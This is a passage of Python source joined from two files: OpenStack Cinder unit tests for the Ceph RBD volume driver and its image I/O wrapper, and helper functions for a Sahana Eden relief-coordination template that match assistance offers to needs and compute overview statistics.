                    'hosts': hosts,
                    'ports': ports,
                    'auth_enabled': False,
                    'auth_username': None,
                    'secret_type': 'ceph',
                    'secret_uuid': None, }
            }
            volume = dict(name=self.volume_name)
            actual = self.driver.initialize_connection(volume, None)
            self.assertDictMatch(expected, actual)
            self.assertTrue(mock_get_mon_addrs.called)
    @common_mocks
    def test_clone(self):
        """_clone() clones the source snapshot via two rados clients."""
        src_pool = u'images'
        src_image = u'image-name'
        src_snap = u'snapshot-name'
        client_stack = []
        def mock__enter__(inst):
            # Record every client context entered so that both the source
            # and the destination ioctx can be asserted below.
            def _inner():
                client_stack.append(inst)
                return inst
            return _inner
        client = self.mock_client.return_value
        # capture both rados client used to perform the clone
        client.__enter__.side_effect = mock__enter__(client)
        self.mock_rbd.RBD.clone = mock.Mock()
        self.driver._clone(self.volume, src_pool, src_image, src_snap)
        # clone(src_ioctx, src_image, src_snap, dest_ioctx, dest_name)
        args = [client_stack[0].ioctx, str(src_image), str(src_snap),
                client_stack[1].ioctx, str(self.volume_name)]
        kwargs = {'features': self.mock_rbd.RBD_FEATURE_LAYERING}
        self.mock_rbd.RBD.clone.assert_called_once_with(*args, **kwargs)
        self.assertEqual(client.__enter__.call_count, 2)
    @common_mocks
    def test_extend_volume(self):
        """extend_volume() resizes the image to the requested size in bytes."""
        fake_size = '20'
        fake_vol = {'project_id': 'testprjid', 'name': self.volume_name,
                    'size': fake_size,
                    'id': 'a720b3c0-d1f0-11e1-9b23-0800200c9a66'}
        # mox record phase: expect _resize with size converted from GiB
        self.mox.StubOutWithMock(self.driver, '_resize')
        size = int(fake_size) * units.Gi
        self.driver._resize(fake_vol, size=size)
        self.mox.ReplayAll()
        self.driver.extend_volume(fake_vol, fake_size)
        self.mox.VerifyAll()
    @common_mocks
    def test_rbd_volume_proxy_init(self):
        """RBDVolumeProxy connects on entry and disconnects only on exit."""
        snap = u'snapshot-name'
        client = self.mock_client.return_value
        client.__enter__.return_value = client
        with mock.patch.object(self.driver, '_connect_to_rados') as \
                mock_connect_from_rados:
            with mock.patch.object(self.driver, '_disconnect_from_rados') as \
                    mock_disconnect_from_rados:
                mock_connect_from_rados.return_value = (None, None)
                mock_disconnect_from_rados.return_value = (None, None)
                with driver.RBDVolumeProxy(self.driver, self.volume_name):
                    mock_connect_from_rados.assert_called_once()
                    self.assertFalse(mock_disconnect_from_rados.called)
                mock_disconnect_from_rados.assert_called_once()
                mock_connect_from_rados.reset_mock()
                mock_disconnect_from_rados.reset_mock()
                # Same lifecycle when a snapshot is requested
                with driver.RBDVolumeProxy(self.driver, self.volume_name,
                                           snapshot=snap):
                    mock_connect_from_rados.assert_called_once()
                    self.assertFalse(mock_disconnect_from_rados.called)
                mock_disconnect_from_rados.assert_called_once()
    @common_mocks
    def test_connect_to_rados(self):
        """_connect_to_rados(): default pool, alt pool, timeout and errors."""
        # Default
        self.cfg.rados_connect_timeout = -1
        self.mock_rados.Rados.connect = mock.Mock()
        self.mock_rados.Rados.shutdown = mock.Mock()
        self.mock_rados.Rados.open_ioctx = mock.Mock()
        self.mock_rados.Rados.open_ioctx.return_value = \
            self.mock_rados.Rados.ioctx
        # default configured pool
        ret = self.driver._connect_to_rados()
        self.assertTrue(self.mock_rados.Rados.connect.called)
        # Expect no timeout if default is used
        self.mock_rados.Rados.connect.assert_called_once_with()
        self.assertTrue(self.mock_rados.Rados.open_ioctx.called)
        self.assertIsInstance(ret[0], self.mock_rados.Rados)
        self.assertEqual(ret[1], self.mock_rados.Rados.ioctx)
        self.mock_rados.Rados.open_ioctx.assert_called_with(self.cfg.rbd_pool)
        # different pool
        ret = self.driver._connect_to_rados('alt_pool')
        self.assertTrue(self.mock_rados.Rados.connect.called)
        self.assertTrue(self.mock_rados.Rados.open_ioctx.called)
        self.assertIsInstance(ret[0], self.mock_rados.Rados)
        self.assertEqual(ret[1], self.mock_rados.Rados.ioctx)
        self.mock_rados.Rados.open_ioctx.assert_called_with('alt_pool')
        # With timeout
        self.cfg.rados_connect_timeout = 1
        self.mock_rados.Rados.connect.reset_mock()
        self.driver._connect_to_rados()
        self.mock_rados.Rados.connect.assert_called_once_with(timeout=1)
        # error: open_ioctx failure must shut the client down and re-raise
        self.mock_rados.Rados.open_ioctx.reset_mock()
        self.mock_rados.Rados.shutdown.reset_mock()
        self.mock_rados.Rados.open_ioctx.side_effect = self.mock_rados.Error
        self.assertRaises(exception.VolumeBackendAPIException,
                          self.driver._connect_to_rados)
        self.mock_rados.Rados.open_ioctx.assert_called_once()
        self.mock_rados.Rados.shutdown.assert_called_once()
class RBDImageIOWrapperTestCase(test.TestCase):
    """Tests for driver.RBDImageIOWrapper, the file-like wrapper around an
    RBD image used for image transfers.
    """

    def setUp(self):
        super(RBDImageIOWrapperTestCase, self).setUp()
        # Mocked volume metadata with a mocked librbd Image behind it
        self.meta = mock.Mock()
        self.meta.user = 'mock_user'
        self.meta.conf = 'mock_conf'
        self.meta.pool = 'mock_pool'
        self.meta.image = mock.Mock()
        self.meta.image.read = mock.Mock()
        self.meta.image.write = mock.Mock()
        self.meta.image.size = mock.Mock()
        self.mock_rbd_wrapper = driver.RBDImageIOWrapper(self.meta)
        self.data_length = 1024
        self.full_data = 'abcd' * 256

    def test_init(self):
        self.assertEqual(self.mock_rbd_wrapper._rbd_meta, self.meta)
        self.assertEqual(self.mock_rbd_wrapper._offset, 0)

    def test_inc_offset(self):
        self.mock_rbd_wrapper._inc_offset(10)
        self.mock_rbd_wrapper._inc_offset(10)
        self.assertEqual(self.mock_rbd_wrapper._offset, 20)

    def test_rbd_image(self):
        self.assertEqual(self.mock_rbd_wrapper.rbd_image, self.meta.image)

    def test_rbd_user(self):
        self.assertEqual(self.mock_rbd_wrapper.rbd_user, self.meta.user)

    def test_rbd_pool(self):
        # Fixed: this test previously asserted rbd_conf (and test_rbd_conf
        # asserted rbd_pool) - each now checks the property it is named for.
        self.assertEqual(self.mock_rbd_wrapper.rbd_pool, self.meta.pool)

    def test_rbd_conf(self):
        self.assertEqual(self.mock_rbd_wrapper.rbd_conf, self.meta.conf)

    def test_read(self):
        def mock_read(offset, length):
            # NOTE(review): only correct for reads starting at offset 0,
            # which is all this test exercises; a general fake would return
            # self.full_data[offset:offset + length].
            return self.full_data[offset:length]

        self.meta.image.read.side_effect = mock_read
        self.meta.image.size.return_value = self.data_length
        # Whole image, then EOF returns ''
        data = self.mock_rbd_wrapper.read()
        self.assertEqual(data, self.full_data)
        data = self.mock_rbd_wrapper.read()
        self.assertEqual(data, '')
        # Rewind and re-read the whole image
        self.mock_rbd_wrapper.seek(0)
        data = self.mock_rbd_wrapper.read()
        self.assertEqual(data, self.full_data)
        # Partial read from the start
        self.mock_rbd_wrapper.seek(0)
        data = self.mock_rbd_wrapper.read(10)
        self.assertEqual(data, self.full_data[:10])

    def test_write(self):
        self.mock_rbd_wrapper.write(self.full_data)
        self.assertEqual(self.mock_rbd_wrapper._offset, 1024)

    def test_seekable(self):
        self.assertTrue(self.mock_rbd_wrapper.seekable)

    def test_seek(self):
        self.assertEqual(self.mock_rbd_wrapper._offset, 0)
        self.mock_rbd_wrapper.seek(10)
        self.assertEqual(self.mock_rbd_wrapper._offset, 10)
        self.mock_rbd_wrapper.seek(10)
        self.assertEqual(self.mock_rbd_wrapper._offset, 10)
        self.mock_rbd_wrapper.seek(10, 1)
        self.assertEqual(self.mock_rbd_wrapper._offset, 20)
        self.mock_rbd_wrapper.seek(0)
        self.mock_rbd_wrapper.write(self.full_data)
        self.meta.image.size.return_value = self.data_length
        self.mock_rbd_wrapper.seek(0)
        self.assertEqual(self.mock_rbd_wrapper._offset, 0)
        # whence=2 seeks relative to the end of the image
        self.mock_rbd_wrapper.seek(10, 2)
        self.assertEqual(self.mock_rbd_wrapper._offset, self.data_length + 10)
        self.mock_rbd_wrapper.seek(-10, 2)
        self.assertEqual(self.mock_rbd_wrapper._offset, self.data_length - 10)
        # test exceptions.
        self.assertRaises(IOError, self.mock_rbd_wrapper.seek, 0, 3)
        self.assertRaises(IOError, self.mock_rbd_wrapper.seek, -1)
        # offset should not have been changed by any of the previous
        # operations.
        self.assertEqual(self.mock_rbd_wrapper._offset, self.data_length - 10)

    def test_tell(self):
        self.assertEqual(self.mock_rbd_wrapper.tell(), 0)
        self.mock_rbd_wrapper._inc_offset(10)
        self.assertEqual(self.mock_rbd_wrapper.tell(), 10)

    def test_flush(self):
        with mock.patch.object(driver, 'LOG') as mock_logger:
            self.meta.image.flush = mock.Mock()
            self.mock_rbd_wrapper.flush()
            self.meta.image.flush.assert_called_once()
            self.meta.image.flush.reset_mock()
            # this should be caught and logged silently.
            self.meta.image.flush.side_effect = AttributeError
            self.mock_rbd_wrapper.flush()
            self.meta.image.flush.assert_called_once()
            msg = _("flush() not supported in this version of librbd")
            mock_logger.warning.assert_called_with(msg)

    def test_fileno(self):
        self.assertRaises(IOError, self.mock_rbd_wrapper.fileno)

    def test_close(self):
        # close() must be callable without error (no-op for the wrapper)
        self.mock_rbd_wrapper.close()
class ManagedRBDTestCase(DriverTestCase):
    """Volume-manager level tests for the RBD driver with the image service
    and flow tasks mocked out.
    """
    driver_name = "cinder.volume.drivers.rbd.RBDDriver"
    def setUp(self):
        super(ManagedRBDTestCase, self).setUp()
        # TODO(dosaboy): need to remove dependency on mox stubs here once
        # image.fake has been converted to mock.
        fake_image.stub_out_image_service(self.stubs)
        self.volume.driver.set_initialized()
        self.volume.stats = {'allocated_capacity_gb': 0,
                             'pools': {}}
        self.called = []
    def _create_volume_from_image(self, expected_status, raw=False,
                                  clone_error=False):
        """Try to clone a volume from an image, and check the status
        afterwards.
        NOTE: if clone_error is True we force the image type to raw otherwise
        clone_image is not called
        """
        # Fixed volume ID so the finally-block cleanup can always find it
        volume_id = 1
        # See tests.image.fake for image types.
        if raw:
            image_id = '155d900f-4e14-4e4c-a73d-069cbf4541e6'
        else:
            image_id = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'
        # creating volume testdata
        db.volume_create(self.context,
                         {'id': volume_id,
                          'updated_at': timeutils.utcnow(),
                          'display_description': 'Test Desc',
                          'size': 20,
                          'status': 'creating',
                          'instance_uuid': None,
                          'host': 'dummy'})
        try:
            if not clone_error:
                self.volume.create_volume(self.context,
                                          volume_id,
                                          image_id=image_id)
            else:
                self.assertRaises(exception.CinderException,
                                  self.volume.create_volume,
                                  self.context,
                                  volume_id,
                                  image_id=image_id)
            volume = db.volume_get(self.context, volume_id)
            self.assertEqual(volume['status'], expected_status)
        finally:
            # cleanup
            db.volume_destroy(self.context, volume_id)
    def test_create_vol_from_image_status_available(self):
        """Clone raw image then verify volume is in available state."""
        def _mock_clone_image(volume, image_location, image_id, image_meta):
            return {'provider_location': None}, True
        with mock.patch.object(self.volume.driver, 'clone_image') as \
                mock_clone_image:
            mock_clone_image.side_effect = _mock_clone_image
            with mock.patch.object(self.volume.driver, 'create_volume') as \
                    mock_create:
                with mock.patch.object(create_volume.CreateVolumeFromSpecTask,
                                       '_copy_image_to_volume') as mock_copy:
                    self._create_volume_from_image('available', raw=True)
                    # Raw image was cloned: no copy, no fresh volume created
                    self.assertFalse(mock_copy.called)
                mock_clone_image.assert_called_once()
                self.assertFalse(mock_create.called)
    def test_create_vol_from_non_raw_image_status_available(self):
        """Clone non-raw image then verify volume is in available state."""
        def _mock_clone_image(volume, image_location, image_id, image_meta):
            return {'provider_location': None}, False
        with mock.patch.object(self.volume.driver, 'clone_image') as \
                mock_clone_image:
            mock_clone_image.side_effect = _mock_clone_image
            with mock.patch.object(self.volume.driver, 'create_volume') as \
                    mock_create:
                with mock.patch.object(create_volume.CreateVolumeFromSpecTask,
                                       '_copy_image_to_volume') as mock_copy:
                    self._create_volume_from_image('available', raw=False)
                    # Non-raw image cannot be cloned: fall back to copy path
                    mock_copy.assert_called_once()
                mock_clone_image.assert_called_once()
                mock_create.assert_called_once()
    def test_create_vol_from_image_status_error(self):
        """Fail to clone raw image then verify volume is in error state."""
        with mock.patch.object(self.volume.driver, 'clone_image') as \
                mock_clone_image:
            mock_clone_image.side_effect = exception.CinderException
            with mock.patch.object(self.volume.driver, 'create_volume'):
                with mock.patch.object(create_volume.CreateVolumeFromSpecTask,
                                       '_copy_image_to_volume') as mock_copy:
                    self._create_volume_from_image('error', raw=True,
                                                   clone_error=True)
                    self.assertFalse(mock_copy.called)
                mock_clone_image.assert_called_once()
                self.assertFalse(self.volume.driver.create_volume.called)
    def test_clone_failure(self):
        """clone_image() returns ({}, False) when cloning is not possible."""
        driver = self.volume.driver
        with mock.patch.object(driver, '_is_cloneable', lambda *args: False):
            image_loc = (mock.Mock(), mock.Mock())
            actual = driver.clone_image(mock.Mock(), image_loc,
                                        mock.Mock(), {})
            self.assertEqual(({}, False), actual)
        # No image location at all -> also not cloned
        self.assertEqual(({}, False),
                         driver.clone_image(object(), None, None, {}))
    def test_clone_success(self):
        """clone_image() clones and resizes when the image is cloneable."""
        expected = ({'provider_location': None}, True)
        driver = self.volume.driver
        with mock.patch.object(self.volume.driver, '_is_cloneable') as \
                mock_is_cloneable:
            mock_is_cloneable.return_value = True
            with mock.patch.object(self.volume.driver, '_clone') as \
                    mock_clone:
                with mock.patch.object(self.volume.driver, '_resize') as \
                        mock_resize:
                    image_loc = ('rbd://fee/fi/fo/fum', None)
                    actual = driver.clone_image({'name': 'vol1'}, image_loc,
                                                'id.foo',
                                                {'disk_format': 'raw'})
                    self.assertEqual(expected, actual)
                    mock_clone.assert_called_once()
                    mock_resize.assert_called_once()
| |
# -*- coding: utf-8 -*-
"""
Helper functions and classes for RLPCM template
@license: MIT
"""
import datetime
import json
import os
from gluon import current, A, DIV, LI, SPAN, UL
from s3 import FS, ICON, S3DateFilter, S3Represent, s3_str, s3_yes_no_represent
from s3db.pr import pr_PersonEntityRepresent
# =============================================================================
def get_role_realms(role):
    """
    Get all realms for which a role has been assigned

    @param role: the role ID or role UUID

    @returns: list of pe_ids the current user has the role for,
              None if the role is assigned site-wide, or an
              empty list if the user does not have the role, or
              no realm for the role
    """

    auth = current.auth

    if isinstance(role, str):
        # Resolve the UUID to a role ID first
        gtable = auth.settings.table_group
        query = (gtable.uuid == role) & \
                (gtable.deleted == False)
        row = current.db(query).select(gtable.id,
                                       cache = current.s3db.cache,
                                       limitby = (0, 1),
                                       ).first()
        role_id = row.id if row else None
    else:
        role_id = role

    user = auth.user
    if not user:
        return []
    return user.realms.get(role_id, [])
# =============================================================================
def get_managed_orgs(role):
    """
    Get the organisations for which the current user has a role

    @param role: the role id or UUID

    @returns: list of organisation pe_ids
    """

    etable = current.s3db.pr_pentity

    query = (etable.instance_type == "org_organisation")
    realms = get_role_realms(role)
    if realms is not None:
        # Restrict to the realms of the role (None == site-wide)
        query = (etable.pe_id.belongs(realms)) & query

    orgs = current.db(query).select(etable.pe_id)
    return [org.pe_id for org in orgs]
# =============================================================================
def get_current_events(record):
    """
    Look up all current events

    @param record: include the event_id of this record even
                   if the event is closed

    @returns: list of event_ids, most recent first
    """

    table = current.s3db.event_event

    query = (table.closed == False)
    if record:
        # Keep the event referenced by the record even if closed
        query |= (table.id == record.event_id)
    query &= (table.deleted == False)

    events = current.db(query).select(table.id,
                                      orderby = ~table.start_date,
                                      )
    return [event.id for event in events]
# =============================================================================
def get_current_location(person_id=None):
    """
    Look up the current tracking location of a person

    @param person_id: the person ID (defaults to logged-in person)

    @returns: the ID of the lowest-level Lx of the current
              tracking location of the person
    """

    from s3 import S3Trackable

    if not person_id:
        person_id = current.auth.s3_logged_in_person()

    trackable = S3Trackable(tablename="pr_person", record_id=person_id)

    location = trackable.get_location()
    if not location:
        return None
    if isinstance(location, list):
        location = location[0]

    # Specific addresses resolve to their parent Lx
    return location.id if location.level else location.parent
# =============================================================================
def get_offer_filters(person_id=None):
    """
    Get filters for br_assistance_offer matching a person's
    current needs

    @param person_id: the person ID

    @returns: S3ResourceQuery to apply to an br_assistance_offer
              resource, or None, if matching is not possible

    # TODO move client-side
    """
    db = current.db
    auth = current.auth
    s3db = current.s3db
    if not person_id:
        person_id = auth.s3_logged_in_person()
    if not person_id:
        return None
    # Lookup all current needs of the person
    atable = s3db.br_case_activity
    ltable = s3db.gis_location
    ptable = s3db.pr_person
    stable = s3db.br_case_activity_status
    today = current.request.utcnow.date()
    join = [ptable.on(ptable.id == atable.person_id),
            stable.on((stable.id == atable.status_id) & \
                      (stable.is_closed == False)),
            ]
    left = ltable.on(ltable.id == atable.location_id)
    # Only open activities with a need type and location, valid today
    query = (atable.person_id == person_id) & \
            (atable.need_id != None) & \
            (atable.location_id != None) & \
            ((atable.date == None) | (atable.date <= today)) & \
            ((atable.end_date == None) | (atable.end_date >= today)) & \
            (atable.deleted == False)
    rows = db(query).select(atable.need_id,
                            atable.location_id,
                            ltable.name,
                            #ltable.parent,
                            ltable.level,
                            ltable.path,
                            ptable.pe_id,
                            join = join,
                            left = left,
                            )
    gis = current.gis
    get_neighbours = gis.get_neighbours
    get_parents = gis.get_parents
    # Build one filter disjunct per current need; remember the person's
    # own pe_id so their own offers can be excluded below
    filters, exclude_provider = None, None
    for row in rows:
        # Provider to exclude
        person = row.pr_person
        exclude_provider = person.pe_id
        activity = row.br_case_activity
        # Match by need
        query = FS("~.need_id") == activity.need_id
        # Match by Location
        # - include exact match if Need is at an Lx
        # - include all higher level Lx
        # - include all adjacent lowest-level Lx
        location_id = activity.location_id
        location = row.gis_location
        level = location.level
        if level:
            # Lx location (the normal case)
            location_ids = [location_id]
            # Include all parent Lx
            parents = get_parents(location_id, feature=location, ids_only=True)
            if parents:
                location_ids += parents
            # Include all adjacent Lx of the same level
            neighbours = get_neighbours(location_id)
            if neighbours:
                location_ids += neighbours
        else:
            # Specific address
            location_ids = []
            # Include all parent Lx
            parents = get_parents(location_id, feature=location, ids_only=True)
            if parents:
                location_ids = parents
                # Include all adjacent Lx of the immediate ancestor Lx
                neighbours = get_neighbours(parents[0])
                if neighbours:
                    location_ids += neighbours
                # Lookup the immediate ancestor's level
                q = (ltable.id == parents[0]) & (ltable.deleted == False)
                row = db(q).select(ltable.level, limitby=(0, 1)).first()
                if row:
                    level = row.level
        if location_ids and level and level < "L4":
            # Include all child Lx of the match locations below level
            # NOTE string comparison of Lx labels ("L1" < "L2" ...) is
            #      relied upon here for level ordering
            # TODO make this recursive to include grandchildren etc. too
            q = (ltable.parent.belongs(location_ids)) & \
                (ltable.level != None) & \
                (ltable.level > level) & \
                (ltable.deleted == False)
            children = db(q).select(ltable.id)
            location_ids += [c.id for c in children]
        if location_ids:
            if len(location_ids) == 1:
                q = FS("~.location_id") == list(location_ids)[0]
            else:
                q = FS("~.location_id").belongs(location_ids)
            query = (query & q) if query else q
        else:
            continue
        filters = (filters | query) if filters else query
    if not filters:
        # Show no results if the user has no needs reported
        return FS("id").belongs(set())
    # Exclude the person's own offers
    if exclude_provider:
        filters &= FS("~.pe_id") != exclude_provider
    return filters
# =============================================================================
class ProviderRepresent(pr_PersonEntityRepresent):
    """
    Representation of assistance offer providers: organisations by
    name, private persons anonymously as "private"
    """
    def __init__(self, as_string=False):
        """
            Constructor

            @param as_string: render private persons as a plain
                              (localized) string rather than as a
                              styled SPAN
        """
        self.as_string = as_string
        # Never show ID tag labels or instance types for providers
        super(ProviderRepresent, self).__init__(show_label = False,
                                                show_type = False,
                                                )
    # -------------------------------------------------------------------------
    def represent_row(self, row):
        """
            Represent a row

            @param row: the Row (joined pr_pentity + instance record)
        """
        pentity = row.pr_pentity
        instance_type = pentity.instance_type
        # Direct attribute access to avoid lazy-join magic of Row
        item = object.__getattribute__(row, instance_type)
        if instance_type == "pr_person":
            # Personal details of private providers are not disclosed
            if self.as_string:
                pe_str = current.T("private")
            else:
                pe_str = SPAN(current.T("private"), _class="free-hint")
        elif "name" in item:
            pe_str = s3_str(item["name"])
        else:
            pe_str = "?"
        return pe_str
# =============================================================================
class OverviewData(object):
    """
    Data extraction for overview page
    """
    # Color palette for categories
    # - same category should use the same color in all contexts
    palette = [
        "ffff00", "ff5500", "55aaff", "aaaa00", "939393", "8b2e8b",
        "1f6c6d", "b31c1c", "ff995e", "457624", "550000", "005500",
        "00007f", "006898", "7777b3", "e1cb74", "100000", "001000",
        "000010", "5500ff", "ffaaff", "00aa7f", "ffaa7f", "3f3f3f",
        "00aaff", "74aa1d", "b30000", "7e547e", "274214", "55007f",
        "0c9cd0", "e03158", "fba629", "8abc3f", "afb8bf",
        ]
    # -------------------------------------------------------------------------
    @classmethod
    def get_color(cls, category):
        """
            Get a color from the palette

            @param category: an integer representing the category

            @returns: CSS hex color (string)
        """
        # Wrap around so any integer maps to a palette entry
        palette = cls.palette
        return "#%s" % (palette[category % len(palette)])
    # -------------------------------------------------------------------------
    @classmethod
    def needs_by_category(cls):
        """
            Count current case activities by need type
            (top 5 need types, for the overview chart)
        """
        db = current.db
        s3db = current.s3db
        atable = s3db.br_case_activity
        stable = s3db.br_case_activity_status
        join = stable.on((stable.id == atable.status_id) & \
                         (stable.is_closed == False))
        # Only activities valid today, with person and need type
        today = current.request.utcnow.date()
        query = ((atable.date == None) | (atable.date <= today)) & \
                ((atable.end_date == None) | (atable.end_date >= today)) & \
                (atable.person_id != None) & \
                (atable.need_id != None) & \
                (atable.deleted == False)
        number = atable.id.count()
        rows = db(query).select(atable.need_id,
                                number,
                                join = join,
                                groupby = atable.need_id,
                                orderby = ~number,
                                limitby = (0, 5),
                                )
        represent = atable.need_id.represent
        labels = represent.bulk([row.br_case_activity.need_id for row in rows])
        values = []
        for row in rows:
            value = row[number]
            need_id = row.br_case_activity.need_id
            need = labels.get(need_id)
            # need_id doubles as the color category so the same need type
            # gets the same color in all charts
            values.append({"label": str(need),
                           "color": cls.get_color(need_id),
                           "value": value if value else 0,
                           })
        return [{"key": s3_str(current.T("Current Need Reports")),
                 "values": values,
                 },
                ]
    # -------------------------------------------------------------------------
    @classmethod
    def offers_by_category(cls):
        """
            Count current assistance offers by need type
            (top 5 need types, for the overview chart)
        """
        db = current.db
        s3db = current.s3db
        atable = s3db.br_assistance_offer
        # Only approved + available offers valid today
        today = current.request.utcnow.date()
        query = (atable.status == "APR") & \
                (atable.availability == "AVL") & \
                ((atable.date == None) | (atable.date <= today)) & \
                ((atable.end_date == None) | (atable.end_date >= today)) & \
                (atable.pe_id != None) & \
                (atable.need_id != None) & \
                (atable.deleted == False)
        number = atable.id.count()
        rows = db(query).select(atable.need_id,
                                number,
                                groupby = atable.need_id,
                                orderby = ~number,
                                limitby = (0, 5),
                                )
        represent = atable.need_id.represent
        labels = represent.bulk([row.br_assistance_offer.need_id for row in rows])
        values = []
        for row in rows:
            value = row[number]
            need_id = row.br_assistance_offer.need_id
            need = labels.get(need_id)
            values.append({"label": str(need),
                           "color": cls.get_color(need_id),
                           "value": value if value else 0,
                           })
        return [{"key": s3_str(current.T("Current Relief Offers")),
                 "values": values,
                 },
                ]
    # -------------------------------------------------------------------------
    @classmethod
    def usage_statistics(cls):
        """
            Establish site usage statistics

            @returns: the usage stats, a dict:
                        {"au": 0,   # Number of active users
                         "ao": 0,   # Number of active organisations
                         "nr": 0,   # Number of active need reports
                         "ro": 0,   # Number of active assistance offers
                         "pn": 0,   # Number of people with needs reported
                         "po": 0,   # Number of users offering help
                         }
        """
        db = current.db
        auth = current.auth
        s3db = current.s3db
        data = {}
        # "Active" = logged in within the last two days
        today = current.request.utcnow
        two_days_back = today - datetime.timedelta(days=2)
        utable = auth.settings.table_user
        gtable = auth.settings.table_group
        mtable = auth.settings.table_membership
        # Reusable condition: registered (no pending key) and recently seen
        active_user = ((utable.registration_key == None) | (utable.registration_key == "")) & \
                      (utable.timestmp > two_days_back) & \
                      (utable.deleted == False)
        # Get the number of active users
        # NOTE(review): no DISTINCT here - a user holding both roles would
        #               seem to be counted twice; confirm intent
        join = [mtable.on((mtable.user_id == utable.id) &
                          (mtable.deleted == False)),
                gtable.on((gtable.id == mtable.group_id) & \
                          (gtable.uuid.belongs(("CITIZEN", "RELIEF_PROVIDER"))))
                ]
        query = active_user
        number = utable.id.count()
        row = db(query).select(number, join=join).first()
        if row:
            data["au"] = row[number]
        # Get the number of active organisations
        # (orgs with a staff member who is an active RELIEF_PROVIDER user)
        htable = s3db.hrm_human_resource
        ptable = s3db.pr_person
        ltable = s3db.pr_person_user
        join = [ptable.on(ptable.id == htable.person_id),
                ltable.on((ltable.pe_id == ptable.pe_id) & \
                          (ltable.deleted == False)),
                utable.on((utable.id == ltable.user_id) & \
                          active_user),
                mtable.on((mtable.user_id == utable.id) &
                          (mtable.deleted == False)),
                gtable.on((gtable.id == mtable.group_id) & \
                          (gtable.uuid == "RELIEF_PROVIDER")),
                ]
        number = htable.organisation_id.count()
        row = db(query).select(number, join=join).first()
        if row:
            data["ao"] = row[number]
        # Count current need reports and distinct beneficiaries
        atable = s3db.br_case_activity
        stable = s3db.br_case_activity_status
        join = stable.on((stable.id == atable.status_id) & \
                         (stable.is_closed == False))
        query = ((atable.date == None) | (atable.date <= today)) & \
                ((atable.end_date == None) | (atable.end_date >= today)) & \
                (atable.deleted == False)
        number = atable.id.count()
        persons = atable.person_id.count(distinct=True)
        row = db(query).select(number, persons, join=join).first()
        if row:
            data["nr"] = row[number]
            data["pn"] = row[persons]
        # Count current assistance offers and distinct providers
        otable = s3db.br_assistance_offer
        query = (otable.status == "APR") & \
                (otable.availability != "RTD") & \
                ((otable.date == None) | (otable.date <= today)) & \
                ((otable.end_date == None) | (otable.end_date >= today)) & \
                (otable.deleted == False)
        number = otable.id.count()
        persons = otable.pe_id.count(distinct=True)
        row = db(query).select(number, persons).first()
        if row:
            data["ro"] = row[number]
            data["po"] = row[persons]
        return data
    # -------------------------------------------------------------------------
    @classmethod
    def update_data(cls):
        """
            Update data files for overview page

            NB requires write-permission for static/data/RLP folder+files
        """
        current.log.debug("Updating overview data")
        # Compact JSON (no whitespace)
        SEPARATORS = (",", ":")
        os_path_join = os.path.join
        json_dump = json.dump
        base = os_path_join(current.request.folder, "static", "data", "RLP")
        path = os_path_join(base, "rlpcm_needs.json")
        data = cls.needs_by_category()
        with open(path, "w") as outfile:
            json_dump(data, outfile, separators=SEPARATORS)
        path = os_path_join(base, "rlpcm_offers.json")
        data = cls.offers_by_category()
        with open(path, "w") as outfile:
            json_dump(data, outfile, separators=SEPARATORS)
        path = os_path_join(base, "rlpcm_usage.json")
        data = cls.usage_statistics()
        with open(path, "w") as outfile:
            json_dump(data, outfile, separators=SEPARATORS)
# =============================================================================
class OfferDetails(object):
    """
    Field methods for compact representation of place and
    contact information of offers
    """

    # -------------------------------------------------------------------------
    @staticmethod
    def place(row):
        # Accept either a joined Row or the gis_location record itself
        location = row.gis_location if hasattr(row, "gis_location") else row
        return tuple(location.get(level) for level in ("L3", "L2", "L1"))

    # -------------------------------------------------------------------------
    @staticmethod
    def place_represent(value, row=None):

        if not (isinstance(value, tuple) and len(value) == 3):
            return value if value else "-"

        l3 = value[0]
        lx = tuple(name if name else "-" for name in value[1:])

        output = DIV(_class = "place-repr",
                     )
        if l3:
            output.append(DIV(l3,
                              _class = "place-name",
                              ))
        if lx:
            output.append(DIV("%s / %s" % lx,
                              _class = "place-info",
                              ))
        return output

    # -------------------------------------------------------------------------
    @staticmethod
    def contact(row):
        # Accept either a joined Row or the br_assistance_offer record itself
        if hasattr(row, "br_assistance_offer"):
            offer = row.br_assistance_offer
        else:
            offer = row
        return tuple(offer.get(detail) for detail in ("contact_name",
                                                      "contact_phone",
                                                      "contact_email",
                                                      ))

    # -------------------------------------------------------------------------
    @staticmethod
    def contact_represent(value, row=None):

        if not (isinstance(value, tuple) and len(value) == 3):
            return value if value else "-"
        if not any(value):
            return ""

        name, phone, email = value
        output = DIV(_class = "contact-repr",
                     )
        if name:
            output.append(SPAN(name,
                               _class = "contact-name",
                               ))
        if email or phone:
            details = DIV(_class="contact-details")
            if phone:
                details.append(DIV(ICON("phone"),
                                   SPAN(phone,
                                        _class = "contact-phone"),
                                   _class = "contact-info",
                                   ))
            if email:
                details.append(DIV(ICON("mail"),
                                   SPAN(A(email,
                                          _href="mailto:%s" % email,
                                          ),
                                        _class = "contact-email"),
                                   _class = "contact-info",
                                   ))
            output.append(details)
        return output
# =============================================================================
class OfferAvailabilityFilter(S3DateFilter):
    """
    Date-Range filter with custom variable
        - without this then we parse as a vfilter which clutters error console
          & is inefficient (including preventing a bigtable optimisation)
    """

    @classmethod
    def _variable(cls, selector, operator):
        # Always filter on the fixed $$available variable, regardless of
        # the selector passed in
        return super()._variable("$$available", operator)

    # -------------------------------------------------------------------------
    @staticmethod
    def apply_filter(resource, get_vars):
        """
        Filter out offers that
        - become available only after a start date, or
        - become unavailable before an end date
        (reversed logic compared to a normal range filter)
        """

        parse_dt = current.calendar.parse_date

        start = parse_dt(get_vars.get("$$available__ge"))
        end = parse_dt(get_vars.get("$$available__le"))

        if start:
            # Offer must have started on/before the requested start date
            resource.add_filter((FS("date") == None) | (FS("date") <= start))
        if end:
            # Offer must not end before the requested end date
            resource.add_filter((FS("end_date") == None) | (FS("end_date") >= end))
# =============================================================================
class ShelterDetails(OfferDetails):
    """
    Field methods for compact representation of place and
    contact information of shelters
    """

    # -------------------------------------------------------------------------
    @staticmethod
    def contact(row):
        """Extract the (name, phone, email) contact details of a shelter"""

        shelter = row.cr_shelter if hasattr(row, "cr_shelter") else row

        return tuple(shelter.get(detail) for detail in ("contact_name",
                                                        "phone",
                                                        "email",
                                                        ))
# =============================================================================
class ServiceListRepresent(S3Represent):

    always_list = True

    def render_list(self, value, labels, show_link=True):
        """
        Helper method to render list-type representations from
        bulk()-results.

        @param value: the list
        @param labels: the labels as returned from bulk()
        @param show_link: render references as links, should
                          be the same as used with bulk()
        """

        show_link = show_link and self.show_link

